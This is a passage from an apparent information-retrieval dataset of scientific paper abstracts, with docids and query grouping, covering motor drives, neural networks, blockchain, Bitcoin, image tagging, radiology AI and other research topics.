"text": "This paper deals with the development and implementation of an on-line stator resistance and permanent magnet flux linkage identification approach devoted to three-phase and open-end winding permanent magnet synchronous motor drives. In particular, the stator resistance and the permanent magnet flux linkage variations are independently determined by exploiting a current vector control strategy, in which one of the phase currents is continuously maintained to zero while the others are suitably modified in order to establish the same rotating magnetomotive force. Moreover, other motor parameters can be evaluated after re-establishing the normal operation of the drive, under the same operating conditions. As will be demonstrated, neither additional sensors nor special tests are required in the proposed method; Motor electrical parameters can be “on-line” estimated in a wide operating range, avoiding any detrimental impact on the torque capability of the PMSM drive.",
"title": ""
},
{
"docid": "181463723aaaf766e387ea292cba8d5d",
"text": "Computational thinking has been promoted in recent years as a skill that is as fundamental as being able to read, write, and do arithmetic. However, what computational thinking really means remains speculative. While wonders, discussions and debates will likely continue, this article provides some analysis aimed to further the understanding of the notion. It argues that computational thinking is likely a hybrid thinking paradigm that must accommodate different thinking modes in terms of the way each would influence what we do in computation. Furthermore, the article makes an attempt to define computational thinking and connect the (potential) thinking elements to the known thinking paradigms. Finally, the author discusses some implications of the analysis.",
"title": ""
},
{
"docid": "b27276c9743bdb33c0cb807653588521",
"text": "Most previous neurophysiological studies evoked emotions by presenting visual stimuli. Models of the emotion circuits in the brain have for the most part ignored emotions arising from musical stimuli. To our knowledge, this is the first emotion brain study which examined the influence of visual and musical stimuli on brain processing. Highly arousing pictures of the International Affective Picture System and classical musical excerpts were chosen to evoke the three basic emotions of happiness, sadness and fear. The emotional stimuli modalities were presented for 70 s either alone or combined (congruent) in a counterbalanced and random order. Electroencephalogram (EEG) Alpha-Power-Density, which is inversely related to neural electrical activity, in 30 scalp electrodes from 24 right-handed healthy female subjects, was recorded. In addition, heart rate (HR), skin conductance responses (SCR), respiration, temperature and psychometrical ratings were collected. Results showed that the experienced quality of the presented emotions was most accurate in the combined conditions, intermediate in the picture conditions and lowest in the sound conditions. Furthermore, both the psychometrical ratings and the physiological involvement measurements (SCR, HR, Respiration) were significantly increased in the combined and sound conditions compared to the picture conditions. Finally, repeated measures ANOVA revealed the largest Alpha-Power-Density for the sound conditions, intermediate for the picture conditions, and lowest for the combined conditions, indicating the strongest activation in the combined conditions in a distributed emotion and arousal network comprising frontal, temporal, parietal and occipital neural structures. Summing up, these findings demonstrate that music can markedly enhance the emotional experience evoked by affective pictures.",
"title": ""
},
{
"docid": "7b42a64b3fbf6548365d8945366af9e9",
"text": "In recent years, Convolutional Neural Networks (ConvNets) have become the quintessential component of several state-of-the-art Artificial Intelligence tasks. Across the spectrum of applications, the performance needs vary significantly, from high-throughput image recognition to the very low-latency requirements of autonomous cars. In this context, FPGAs can provide a potential platform that can be optimally configured based on different performance requirements. However, with the increasing complexity of ConvNet models, the architectural design space becomes overwhelmingly large, asking for principled design flows that address the application-level needs. This paper presents a latency-driven design methodology for mapping ConvNets on FPGAs. The proposed design flow employs novel transformations over a Synchronous Dataflow-based modelling framework together with a latency-centric optimisation procedure in order to efficiently explore the design space targeting low-latency designs. Quantitative evaluation shows large improvements in latency when latency-driven optimisation is in place yielding designs that improve the latency of AlexNet by 73.54× and VGG16 by 5.61× over throughput-optimised designs.",
"title": ""
},
{
"docid": "c049f188b31bbc482e16d22a8061abfa",
"text": "SDN deployments rely on switches that come from various vendors and differ in terms of performance and available features. Understanding these differences and performance characteristics is essential for ensuring successful deployments. In this paper we measure, report, and explain the performance characteristics of flow table updates in three hardware OpenFlow switches. Our results can help controller developers to make their programs efficient. Further, we also highlight differences between the OpenFlow specification and its implementations, that if ignored, pose a serious threat to network security and correctness.",
"title": ""
},
{
"docid": "bdcb688bc914307d811114b2749e47c2",
"text": "E-government initiatives are in their infancy in many developing countries. The success of these initiatives is dependent on government support as well as citizens' adoption of e-government services. This study adopted the unified of acceptance and use of technology (UTAUT) model to explore factors that determine the adoption of e-government services in a developing country, namely Kuwait. 880 students were surveyed, using an amended version of the UTAUT model. The empirical data reveal that performance expectancy, effort expectancy and peer influence determine students' behavioural intention. Moreover, facilitating conditions and behavioural intentions determine students' use of e-government services. Implications for decision makers and suggestions for further research are also considered in this study.",
"title": ""
},
{
"docid": "31cf550d44266e967716560faeb30f2b",
"text": "The explosion in workload complexity and the recent slow-down in Moore’s law scaling call for new approaches towards efficient computing. Researchers are now beginning to use recent advances in machine learning in software optimizations, augmenting or replacing traditional heuristics and data structures. However, the space of machine learning for computer hardware architecture is only lightly explored. In this paper, we demonstrate the potential of deep learning to address the von Neumann bottleneck of memory performance. We focus on the critical problem of learning memory access patterns, with the goal of constructing accurate and efficient memory prefetchers. We relate contemporary prefetching strategies to n-gram models in natural language processing, and show how recurrent neural networks can serve as a drop-in replacement. On a suite of challenging benchmark datasets, we find that neural networks consistently demonstrate superior performance in terms of precision and recall. This work represents the first step towards practical neural-network based prefetching, and opens a wide range of exciting directions for machine learning in computer architecture research.",
"title": ""
},
{
"docid": "4d93be453dcb767faca082d966af5f3a",
"text": "This paper presents a unified variational formulation for joint object segmentation and stereo matching, which takes both accuracy and efficiency into account. In our approach, depth-map consists of compact objects, each object is represented through three different aspects: the perimeter in image space; the slanted object depth plane; and the planar bias, which is to add an additional level of detail on top of each object plane in order to model depth variations within an object. Compared with traditional high quality solving methods in low level, we use a convex formulation of the multilabel Potts Model with PatchMatch stereo techniques to generate depth-map at each image in object level and show that accurate multiple view reconstruction can be achieved with our formulation by means of induced homography without discretization or staircasing artifacts. Our model is formulated as an energy minimization that is optimized via a fast primal-dual algorithm, which can handle several hundred object depth segments efficiently. Performance evaluations in the Middlebury benchmark data sets show that our method outperforms the traditional integer-valued disparity strategy as well as the original PatchMatch algorithm and its variants in subpixel accurate disparity estimation. The proposed algorithm is also evaluated and shown to produce consistently good results for various real-world data sets (KITTI benchmark data sets and multiview benchmark data sets).",
"title": ""
},
{
"docid": "72607f5a6371e1d3e390c93bd0dff25b",
"text": "In this paper we present ASPOGAMO, a vision system capable of estimating motion trajectories of soccer players taped on video. The system performs well in a multitude of application scenarios because of its adaptivity to various camera setups, such as single or multiple camera settings, static or dynamic ones. Furthermore, ASPOGAMO can directly process image streams taken from TV broadcast, and extract all valuable information despite scene interruptions and cuts between different cameras. The system achieves a high level of robustness through the use of modelbased vision algorithms for camera estimation and player recognition and a probabilistic multi-player tracking framework capable of dealing with occlusion situations typical in team-sports. The continuous interplay between these submodules is adding to both the reliability and the efficiency of the overall system.",
"title": ""
},
{
"docid": "d96eecc4b27d8717c07562686f702066",
"text": "The paper’s research purpose is to discuss the key firm-specific IT capability and its impact on the business value of IT. In the context of IT application in China, the paper builds research model based on Resource-Based View, this model describes how the partnership between business and IT management partially mediates the effects of IT infrastructure capability and managerial IT skills on the organization-level of IT assimilation(as proxy for business value of IT ). This research releases 105 questionnaires to part-time MBA in the Renmin University of China and gets 70 valid questionnaires, then analyzed the measurement and structural research model by PLS method. The result of the structural model shows the investment in infrastructure capability and managerial IT skills should be transformed into the partnership between IT and business, and then influence the IT assimilation. The paper can give suggestions to the firms about how to identify and improve IT capability, which will help organization to get superior business value from IT investment.",
"title": ""
},
{
"docid": "577e229bb458d01fcf72119956844bb2",
"text": "This paper examines the role of culture as a factor in enhancing the effectiveness of health communication. We describe culture and how it may be applied in audience segmentation and introduce a model of health communication planning--McGuire's communication/persuasion model--as a framework for considering the ways in which culture may influence health communication effectiveness. For three components of the model (source, message, and channel factors), the paper reviews how each affects communication and persuasion, and how each may be affected by culture. We conclude with recommendations for future research on culture and health communication.",
"title": ""
},
{
"docid": "0df1a06896fc4a98ee2d98f9e81a6969",
"text": "Today, 77GHz FMCW (Frequency Modulation Continuous Wave) radar sensors are used for automotive applications. In typical automotive radar, the target of interest is a moving target. Thus, to improve the detection probability and reduce the false alarm rate, an MTD(Moving Target Detection) algorithm should be required. This paper describes the proposed two-step MTD algorithm. The 1st MTD processing consists of a clutter cancellation step and a noise cancellation step. The two steps can cancel almost all clutter including stationary targets. However, clutter still remains among the interest beat frequencies detected during the 1st MTD and CFAR (Constant False Alarm) processing. Thus, in the 2nd MTD step, we remove the rest of the clutter with zero phase variation.",
"title": ""
},
{
"docid": "bd320ffcd9c28e2c3ea2d69039bfdbe9",
"text": "3D LiDAR scanners are playing an increasingly important role in autonomous driving as they can generate depth information of the environment. However, creating large 3D LiDAR point cloud datasets with point-level labels requires a significant amount of manual annotation. This jeopardizes the efficient development of supervised deep learning algorithms which are often data-hungry. We present a framework to rapidly create point clouds with accurate point-level labels from a computer game. To our best knowledge, this is the first publication on LiDAR point cloud simulation framework for autonomous driving. The framework supports data collection from both auto-driving scenes and user-configured scenes. Point clouds from auto-driving scenes can be used as training data for deep learning algorithms, while point clouds from user-configured scenes can be used to systematically test the vulnerability of a neural network, and use the falsifying examples to make the neural network more robust through retraining. In addition, the scene images can be captured simultaneously in order for sensor fusion tasks, with a method proposed to do automatic registration between the point clouds and captured scene images. We show a significant improvement in accuracy (+9%) in point cloud segmentation by augmenting the training dataset with the generated synthesized data. Our experiments also show by testing and retraining the network using point clouds from user-configured scenes, the weakness/blind spots of the neural network can be fixed.",
"title": ""
},
{
"docid": "b814b220d6ea8a9b304b96c55fc968f3",
"text": "The blockchain initially gained traction in 2008 as the technology underlying Bitcoin [105], but now has been employed in a diverse range of applications and created a global market worth over $150B as of 2017. What distinguishes blockchains from traditional distributed databases is the ability to operate in a decentralized setting without relying on a trusted third party. As such their core technical component is consensus: how to reach agreement among a group of nodes. This has been extensively studied already in the distributed systems community for closed systems, but its application to open blockchains has revitalized the field and led to a plethora of new designs. The inherent complexity of consensus protocols and their rapid and dramatic evolution makes it hard to contextualize the design landscape. We address this challenge by conducting a systematic and comprehensive study of blockchain consensus protocols. After first discussing key themes in classical consensus protocols, we describe: (i) protocols based on proof-of-work (PoW), (ii) proof-of-X (PoX) protocols that replace PoW with more energy-efficient alternatives, and (iii) hybrid protocols that are compositions or variations of classical consensus protocols. We develop a framework to evaluate their performance, security and design properties, and use it to systematize key themes in the protocol categories described above. This evaluation leads us to identify research gaps and challenges for the community to consider in future research endeavours.",
"title": ""
},
{
"docid": "4b546f3bc34237d31c862576ecf63f9a",
"text": "Optimizing the internal supply chain for direct or production goods was a major element during the implementation of enterprise resource planning systems (ERP) which has taken place since the late 1980s. However, supply chains to the suppliers of indirect materials were not usually included due to low transaction volumes, low product values and low strategic importance of these goods. With the advent of the Internet, systems for streamlining indirect goods supply chains emerged and were adopted by many companies. In view of the paperprone processes in many companies, the implementation of these electronic procurement systems led to substantial improvement potentials. This research reports the quantitative and qualitative results of a benchmarking study which explores the use of the Internet in procurement (eProcurement). Among the major goals are to obtain more insight on how European and North American companies used and introduced eProcurement solutions as well as how these systems enhanced the procurement function. The analysis presents a heterogeneous picture and shows that all analyzed solutions emphasize different parts of the procurement and coordination process. Based on interviews and case studies the research proposes an initial set of generalized success factors which may improve future implementations and stimulate further success factor research.",
"title": ""
}
] | scidocsrr |
ce51c97a4926c640f8c461b852b867b4 | Artificial Intelligence and Machine Learning in Radiology: Opportunities, Challenges, Pitfalls, and Criteria for Success. | [
{
"docid": "ec90e30c0ae657f25600378721b82427",
"text": "We use deep max-pooling convolutional neural networks to detect mitosis in breast histology images. The networks are trained to classify each pixel in the images, using as context a patch centered on the pixel. Simple postprocessing is then applied to the network output. Our approach won the ICPR 2012 mitosis detection competition, outperforming other contestants by a significant margin.",
"title": ""
},
{
"docid": "b27224825bb28b9b8d0eea37f8900d42",
"text": "The use of Convolutional Neural Networks (CNN) in natural im age classification systems has produced very impressive results. Combined wit h the inherent nature of medical images that make them ideal for deep-learning, fu rther application of such systems to medical image classification holds much prom ise. However, the usefulness and potential impact of such a system can be compl etely negated if it does not reach a target accuracy. In this paper, we present a s tudy on determining the optimum size of the training data set necessary to achiev e igh classification accuracy with low variance in medical image classification s ystems. The CNN was applied to classify axial Computed Tomography (CT) imag es into six anatomical classes. We trained the CNN using six different sizes of training data set ( 5, 10, 20, 50, 100, and200) and then tested the resulting system with a total of 6000 CT images. All images were acquired from the Massachusetts G eneral Hospital (MGH) Picture Archiving and Communication System (PACS). U sing this data, we employ the learning curve approach to predict classificat ion ccuracy at a given training sample size. Our research will present a general me thodology for determining the training data set size necessary to achieve a cert in target classification accuracy that can be easily applied to other problems within such systems.",
"title": ""
}
] | [
{
"docid": "4b2b4caa7dbf747833ff0f5f669ffa64",
"text": "This paper studies the use of everyday words to describe images. The common saying has it that 'a picture is worth a thousand words', here we ask which thousand? The proliferation of tagged social multimedia data presents a challenge to understanding collective tag-use at large scale -- one can ask if patterns from photo tags help understand tag-tag relations, and how it can be leveraged to improve visual search and recognition. We propose a new method to jointly analyze three distinct visual knowledge resources: Flickr, ImageNet/WordNet, and ConceptNet. This allows us to quantify the visual relevance of both tags learn their relationships. We propose a novel network estimation algorithm, Inverse Concept Rank, to infer incomplete tag relationships. We then design an algorithm for image annotation that takes into account both image and tag features. We analyze over 5 million photos with over 20,000 visual tags. The statistics from this collection leads to good results for image tagging, relationship estimation, and generalizing to unseen tags. This is a first step in analyzing picture tags and everyday semantic knowledge. Potential other applications include generating natural language descriptions of pictures, as well as validating and supplementing knowledge databases.",
"title": ""
},
{
"docid": "4eaf40cdef12d0d2be1d3c6a96c94841",
"text": "Acknowledgements in research publications, like citations, indicate influential contributions to scientific work; however, large-scale acknowledgement analyses have traditionally been impractical due to the high cost of manual information extraction. In this paper we describe a mixture method for automatically mining acknowledgements from research documents using a combination of a Support Vector Machine and regular expressions. The algorithm has been implemented as a plug-in to the CiteSeer Digital Library and the extraction results have been integrated with the traditional metadata and citation index of the CiteSeer system. As a demonstration, we use CiteSeer's autonomous citation indexing (ACI) feature to measure the relative impact of acknowledged entities, and present the top twenty acknowledged entities within the archive.",
"title": ""
},
{
"docid": "0208d66e905292e1c83cf4af43f2b8aa",
"text": "Dynamic time warping (DTW), which finds the minimum path by providing non-linear alignments between two time series, has been widely used as a distance measure for time series classification and clustering. However, DTW does not account for the relative importance regarding the phase difference between a reference point and a testing point. This may lead to misclassification especially in applications where the shape similarity between two sequences is a major consideration for an accurate recognition. Therefore, we propose a novel distance measure, called a weighted DTW (WDTW), which is a penaltybased DTW. Our approach penalizes points with higher phase difference between a reference point and a testing point in order to prevent minimum distance distortion caused by outliers. The rationale underlying the proposed distance measure is demonstrated with some illustrative examples. A new weight function, called the modified logistic weight function (MLWF), is also proposed to systematically assign weights as a function of the phase difference between a reference point and a testing point. By applying different weights to adjacent points, the proposed algorithm can enhance the detection of similarity between two time series. We show that some popular distance measures such as DTW and Euclidean distance are special cases of our proposed WDTW measure. We extend the proposed idea to other variants of DTW such as derivative dynamic time warping (DDTW) and propose the weighted version of DDTW. We have compared the performances of our proposed procedures with other popular approaches using public data sets available through the UCR Time Series Data Mining Archive for both time series classification and clustering problems. The experimental results indicate that the proposed approaches can achieve improved accuracy for time series classification and clustering problems. & 2011 Published by Elsevier Ltd.",
"title": ""
},
{
"docid": "3aaf7b95e0b3e7642c3065f3bc55692c",
"text": "iv 1 Problem Definition 1 2 Origins from Two Extremes 3 2.1 The Origins of Agile Methods 3 2.2 The Origins of CMMI 5 3 Factors that Affect Perception 7 3.1 Misuse 7 3.2 Lack of Accurate Information 8 3.3 Terminology Difficulties 9 4 The Truth About CMMI 11 4.1 CMMI Is a Model, Not a Process Standard 11 4.2 Process Areas, Not Processes 13 4.3 SCAMPI Appraisals 14 5 The Truth About Agile 16 6 There Is Value in Both Paradigms 20 6.1 Challenges When Using Agile 20 6.2 Challenges When Using CMMI 22 6.3 Current Published Research 23 6.4 The Hope in Recent Trends 24 7 Problems Not Solved by CMMI nor Agile 27",
"title": ""
},
{
"docid": "57fa714fe57f10899cbaec11f67851a2",
"text": "This study investigated the relationship between anxiety and feelings of being connected to nature. Two standardised self-report scales, the Nature Relatedness Scale and the State Trait Inventory for Cognitive and Somatic Anxiety, were used in tandem with a qualitative question. Quantitative results indicated that connection to nature was significantly related to lower levels of overall, state cognitive and trait cognitive anxiety. Qualitative results revealed seven themes: relaxation, time out, enjoyment, connection, expanse, sensory engagement and a healthy perspective. Taken together, these results suggest that opportunities that enhance experiences of being connected to nature may reduce unhelpful anxiety.",
"title": ""
},
{
"docid": "f985b4db1646afdd014b2668267e947f",
"text": "The encode-decoder framework has shown recent success in image captioning. Visual attention, which is good at detailedness, and semantic attention, which is good at comprehensiveness, have been separately proposed to ground the caption on the image. In this paper, we propose the Stepwise Image-Topic Merging Network (simNet) that makes use of the two kinds of attention at the same time. At each time step when generating the caption, the decoder adaptively merges the attentive information in the extracted topics and the image according to the generated context, so that the visual information and the semantic information can be effectively combined. The proposed approach is evaluated on two benchmark datasets and reaches the state-of-the-art performances.1",
"title": ""
},
{
"docid": "2bb78e27f9546b938caf8be04f1a8b99",
"text": "While there has been an explosion of impressive, datadriven AI applications in recent years, machines still largely lack a deeper understanding of the world to answer questions that go beyond information explicitly stated in text, and to explain and discuss those answers. To reach this next generation of AI applications, it is imperative to make faster progress in areas of knowledge, modeling, reasoning, and language. Standardized tests have often been proposed as a driver for such progress, with good reason: Many of the questions require sophisticated understanding of both language and the world, pushing the boundaries of AI, while other questions are easier, supporting incremental progress. In Project Aristo at the Allen Institute for AI, we are working on a specific version of this challenge, namely having the computer pass Elementary School Science and Math exams. Even at this level there is a rich variety of problems and question types, the most difficult requiring significant progress in AI. Here we propose this task as a challenge problem for the community, and are providing supporting datasets. Solutions to many of these problems would have a major impact on the field so we encourage you: Take the Aristo Challenge!",
"title": ""
},
{
"docid": "5549b770dd97c58e6bc5fc18b316e0e4",
"text": "Due to its rapid speed of information spread, wide user bases, and extreme mobility, Twitter is drawing attention as a potential emergency reporting tool under extreme events. However, at the same time, Twitter is sometimes despised as a citizen based non-professional social medium for propagating misinformation, rumors, and, in extreme case, propaganda. This study explores the working dynamics of the rumor mill by analyzing Twitter data of the Haiti Earthquake in 2010. For this analysis, two key variables of anxiety and informational uncertainty are derived from rumor theory, and their interactive dynamics are measured by both quantitative and qualitative methods. Our research finds that information with credible sources contribute to suppress the level of anxiety in Twitter community, which leads to rumor control and high information quality.",
"title": ""
},
{
"docid": "3ddac782fd9797771505a4a46b849b45",
"text": "A number of studies have found that mortality rates are positively correlated with income inequality across the cities and states of the US. We argue that this correlation is confounded by the effects of racial composition. Across states and Metropolitan Statistical Areas (MSAs), the fraction of the population that is black is positively correlated with average white incomes, and negatively correlated with average black incomes. Between-group income inequality is therefore higher where the fraction black is higher, as is income inequality in general. Conditional on the fraction black, neither city nor state mortality rates are correlated with income inequality. Mortality rates are higher where the fraction black is higher, not only because of the mechanical effect of higher black mortality rates and lower black incomes, but because white mortality rates are higher in places where the fraction black is higher. This result is present within census regions, and for all age groups and both sexes (except for boys aged 1-9). It is robust to conditioning on income, education, and (in the MSA results) on state fixed effects. Although it remains unclear why white mortality is related to racial composition, the mechanism working through trust that is often proposed to explain the effects of inequality on health is also consistent with the evidence on racial composition and mortality.",
"title": ""
},
{
"docid": "33785cf7f10a58b2fbd29010eceb60d5",
"text": "Maximum power point tracking (MPPT) is essential for photovoltaic (PV) string inverter systems. Partially shaded PV strings with bypass diodes exhibit multiple peaks in the power-voltage characteristic. Under partial shading conditions, conventional algorithms get trapped in a local maximum power point, and fail to track the global MPP (GMPP). To overcome this problem, global search algorithms such as particle swarm optimization (PSO) have been proposed. However, these can cause excessive oscillations in the output power before converging onto the GMPP. In this paper, a new GMPPT technique combining the PSO and Perturb and Observe (P&O) algorithms has been presented. The P&O technique is used to track the MPP under uniform irradiance, and the same is used to detect the occurrence of partial shading. Only on the onset of partial shading conditions, PSO is employed. Furthermore, the search space of PSO is reduced by using a window-based search in order to reduce the power oscillations and convergence time. The effectiveness of the proposed algorithm in tracking the GMPP, both under uniform and nonuniform irradiance conditions, is demonstrated experimentally.",
"title": ""
},
{
"docid": "bc8b40babfc2f16144cdb75b749e3a90",
"text": "The Bitcoin scheme is a rare example of a large scale global payment system in which all the transactions are publicly accessible (but in an anonymous way). We downloaded the full history of this scheme, and analyzed many statistical properties of its associated transaction graph. In this paper we answer for the first time a variety of interesting questions about the typical behavior of users, how they acquire and how they spend their bitcoins, the balance of bitcoins they keep in their accounts, and how they move bitcoins between their various accounts in order to better protect their privacy. In addition, we isolated all the large transactions in the system, and discovered that almost all of them are closely related to a single large transaction that took place in November 2010, even though the associated users apparently tried to hide this fact with many strange looking long chains and fork-merge structures in the transaction graph.",
"title": ""
},
{
"docid": "0d2b905bc0d7f117d192a8b360cc13f0",
"text": "We investigate a previously unknown phase of phosphorus that shares its layered structure and high stability with the black phosphorus allotrope. We find the in-plane hexagonal structure and bulk layer stacking of this structure, which we call \"blue phosphorus,\" to be related to graphite. Unlike graphite and black phosphorus, blue phosphorus displays a wide fundamental band gap. Still, it should exfoliate easily to form quasi-two-dimensional structures suitable for electronic applications. We study a likely transformation pathway from black to blue phosphorus and discuss possible ways to synthesize the new structure.",
"title": ""
},
{
"docid": "c43785187ce3c4e7d1895b628f4a2df3",
"text": "In this paper we focus on the connection between age and language use, exploring age prediction of Twitter users based on their tweets. We discuss the construction of a fine-grained annotation effort to assign ages and life stages to Twitter users. Using this dataset, we explore age prediction in three different ways: classifying users into age categories, by life stages, and predicting their exact age. We find that an automatic system achieves better performance than humans on these tasks and that both humans and the automatic systems have difficulties predicting the age of older people. Moreover, we present a detailed analysis of variables that change with age. We find strong patterns of change, and that most changes occur at young ages.",
"title": ""
},
{
"docid": "65cdcf3d4da07205afe67b0d7a210993",
"text": "In this paper, wireless telemetry using the near-field coupling technique with round-wire coils for an implanted cardiac microstimulator is presented. The proposed system possesses an external powering amplifier and an internal bidirectional microstimulator. The energy of the microstimulator is provided by a rectifier that can efficiently charge a rechargeable device. A fully integrated regulator and a charge pump circuit are included to generate a stable, low-voltage, and high-potential supply voltage, respectively. A miniature digital processor includes a phase-shift-keying (PSK) demodulator to decode the transmission data and a self-protective system controller to operate the entire system. To acquire the cardiac signal, a low-voltage and low-power monitoring analog front end (MAFE) performs immediate threshold detection and data conversion. In addition, the pacing circuit, which consists of a pulse generator (PG) and its digital-to-analog (D/A) controller, is responsible for stimulating heart tissue. The chip was fabricated by Taiwan Semiconductor Manufacturing Company (TSMC) with 0.35-μm complementary metal-oxide semiconductor technology to perform the monitoring and pacing functions with inductively powered communication. Using a model with lead and heart tissue on measurement, a -5-V pulse at a stimulating frequency of 60 beats per minute (bpm) is delivered while only consuming 31.5 μW of power.",
"title": ""
},
{
"docid": "96dec027591a118cbc6a94d7fc52ade8",
"text": "A new approach based on interval analysis is developed to find the global minimum-jerk (MJ) trajectory of a robot manipulator within a joint space scheme using cubic splines. MJ trajectories are desirable for their similarity to human joint movements and for their amenability to path tracking and to limit robot vibrations. This makes them attractive choices for robotic applications, in spite of the fact that the manipulator dynamics is not taken into account. Cubic splines are used in a framework that assures overall continuity of velocities and accelerations in the robot movement. The resulting MJ trajectory planning is shown to be a global constrained minimax optimization problem. This is solved by a newly devised algorithm based on interval analysis and proof of convergence with certainty to an arbitrarily good global solution is provided. The proposed planning method is applied to an example regarding a six-joint manipulator and comparisons with an alternative MJ planner are exposed.",
"title": ""
},
{
"docid": "a02882240114791b555392f5adda76aa",
"text": "This book contains information obtained from authentic and highly regarded sources. Reasonable efforts have been made to publish reliable data and information, but the author and publisher cannot assume responsibility for the validity of all materials or the consequences of their use. The authors and publishers have attempted to trace the copyright holders of all material reproduced in this publication and apologize to copyright holders if permission to publish in this form has not been obtained. If any copyright material has not been acknowledged please write and let us know so we may rectify in any future reprint. Except as permitted under U.S. Copyright Law, no part of this book may be reprinted, reproduced, transmitted, or utilized in any form by any electronic, mechanical, or other means, now known or hereafter invented, including photocopying , microfilming, and recording, or in any information storage or retrieval system, without written permission from the publishers. 978-750-8400. CCC is a not-for-profit organization that provides licenses and registration for a variety of users. For organizations that have been granted a photocopy license by the CCC, a separate system of payment has been arranged. Trademark Notice: Product or corporate names may be trademarks or registered trademarks, and are used only for identification and explanation without intent to infringe. Data clustering : algorithms and applications / [edited by] Charu C. Aggarwal, Chandan K. Reddy. pages cm.-(Chapman & Hall/CRC data mining and knowledge discovery series) Includes bibliographical references and index.",
"title": ""
},
{
"docid": "2ca2b26ae422cf95dd454867fa6c3571",
"text": "The Wallops 18-Meter diameter UHF-Band and the Morehead State 21-Meter diameter current S-band and future XBand and UHF-Band CubeSat Groundstations answer a growing need for high data rate from CubeSats over government licensed frequencies. Ten years ago, when CubeSats began, they were nothing more than simple science experiments, typically consisting of a camera and a low data rate radio. The success and wide community support for the National Science Foundation (NSF) CubeSat Program combined with the increasing number of NASA proposals that utilize CubeSats, and other large government organizations that have started funding CubeSats, demonstrates the maturation of the CubeSat platform. The natural gain provided by the large diameter UHF-, Xand SBand Groundstations enables high data rates (e.g. 3.0 Mbit, 300 times the typical 9.6 Kbit for CubeSats over UHF). Government funded CubeSats using amateur radio frequencies may violate the intent of the amateur radio service and it is a violation of National Telecommunications Information Administration (NTIA) rules for a government funded ground station to use amateur radio frequencies to communicate with CubeSats. The NSF has led the charge in finding a suitable government frequency band for CubeSats. Although amateur frequency licensing has historically been easy and fast to obtain, it limits downlink data rate capability due to narrow spectrum bandwidth allocation. In addition to limited bandwidth allocation, using unencrypted and published downlink telemetry data, easily accessible by any receiver, has not satisfied the needs of universities, industry and government agencies. After completing a decade mainly operating at the amateur radio frequency and using inexpensive but unreliable amateur commercial off-the-shelf (COTS) space and ground hardware, the CubeSat community is looking for different CubeSat and ground system communication solutions to support their current and future needs.",
"title": ""
},
{
"docid": "acdd0043b764fe8bb9904ea6ca71e5cf",
"text": "We investigate the task of 2D articulated human pose estimation in unconstrained still images. This is extremely challenging because of variation in pose, anatomy, clothing, and imaging conditions. Current methods use simple models of body part appearance and plausible configurations due to limitations of available training data and constraints on computational expense. We show that such models severely limit accuracy. Building on the successful pictorial structure model (PSM) we propose richer models of both appearance and pose, using state-of-the-art discriminative classifiers without introducing unacceptable computational expense. We introduce a new annotated database of challenging consumer images, an order of magnitude larger than currently available datasets, and demonstrate over 50% relative improvement in pose estimation accuracy over a stateof-the-art method.",
"title": ""
},
{
"docid": "9736331d674470adbe534503ef452cca",
"text": "In this paper we present our system for human-in-theloop video object segmentation. The backbone of our system is a method for one-shot video object segmentation [3]. While fast, this method requires an accurate pixel-level segmentation of one (or several) frames as input. As manually annotating such a segmentation is impractical, we propose a deep interactive image segmentation method, that can accurately segment objects with only a handful of clicks. On the GrabCut dataset, our method obtains 90% IOU with just 3.8 clicks on average, setting the new state of the art. Furthermore, as our method iteratively refines an initial segmentation, it can effectively correct frames where the video object segmentation fails, thus allowing users to quickly obtain high quality results even on challenging sequences. Finally, we investigate usage patterns and give insights in how many steps users take to annotate frames, what kind of corrections they provide, etc., thus giving important insights for further improving interactive video segmentation.",
"title": ""
}
] | scidocsrr |
f6a6afd95141af8dfac9ea36bbd5cc77 | A Three-Way Model for Collective Learning on Multi-Relational Data | [
{
"docid": "db897ae99b6e8d2fc72e7d230f36b661",
"text": "All rights reserved. No part of this book may be reproduced in any form by any electronic or mechanical means (including photocopying, recording, or information storage and retrieval) without permission in writing from the publisher.",
"title": ""
},
{
"docid": "7f1c7a0887917937147c8f5b2dbe2df3",
"text": "We consider the problem of learning probabilistic models fo r c mplex relational structures between various types of objects. A model can hel p us “understand” a dataset of relational facts in at least two ways, by finding in terpretable structure in the data, and by supporting predictions, or inferences ab out whether particular unobserved relations are likely to be true. Often there is a t radeoff between these two aims: cluster-based models yield more easily interpret abl representations, while factorization-based approaches have given better pr edictive performance on large data sets. We introduce the Bayesian Clustered Tensor Factorization (BCTF) model, which embeds a factorized representation of relatio ns in a nonparametric Bayesian clustering framework. Inference is fully Bayesia n but scales well to large data sets. The model simultaneously discovers interp retable clusters and yields predictive performance that matches or beats previo us probabilistic models for relational data.",
"title": ""
}
] | [
{
"docid": "84d2cb7c4b8e0f835dab1cd3971b60c5",
"text": "Ambient intelligence (AmI) deals with a new world of ubiquitous computing devices, where physical environments interact intelligently and unobtrusively with people. These environments should be aware of people's needs, customizing requirements and forecasting behaviors. AmI environments can be diverse, such as homes, offices, meeting rooms, schools, hospitals, control centers, vehicles, tourist attractions, stores, sports facilities, and music devices. Artificial intelligence research aims to include more intelligence in AmI environments, allowing better support for humans and access to the essential knowledge for making better decisions when interacting with these environments. This article, which introduces a special issue on AmI, views the area from an artificial intelligence perspective.",
"title": ""
},
{
"docid": "ab443adab8954fb4b4fcd02fba97b058",
"text": "We present a novel one-transistor/one-resistor (1T1R) synapse for neuromorphic networks, based on phase change memory (PCM) technology. The synapse is capable of spike-timing dependent plasticity (STDP), where gradual potentiation relies on set transition, namely crystallization, in the PCM, while depression is achieved via reset or amorphization of a chalcogenide active volume. STDP characteristics are demonstrated by experiments under variable initial conditions and number of pulses. Finally, we support the applicability of the 1T1R synapse for learning and recognition of visual patterns by simulations of fully connected neuromorphic networks with 2 or 3 layers with high recognition efficiency. The proposed scheme provides a feasible low-power solution for on-line unsupervised machine learning in smart reconfigurable sensors.",
"title": ""
},
{
"docid": "fea31b71829803d78dabf784dfdb0093",
"text": "Tag recommendation is helpful for the categorization and searching of online content. Existing tag recommendation methods can be divided into collaborative filtering methods and content based methods. In this paper, we put our focus on the content based tag recommendation due to its wider applicability. Our key observation is the tag-content co-occurrence, i.e., many tags have appeared multiple times in the corresponding content. Based on this observation, we propose a generative model (Tag2Word), where we generate the words based on the tag-word distribution as well as the tag itself. Experimental evaluations on real data sets demonstrate that the proposed method outperforms several existing methods in terms of recommendation accuracy, while enjoying linear scalability.",
"title": ""
},
{
"docid": "92a0fb602276952962762b07e7cd4d2b",
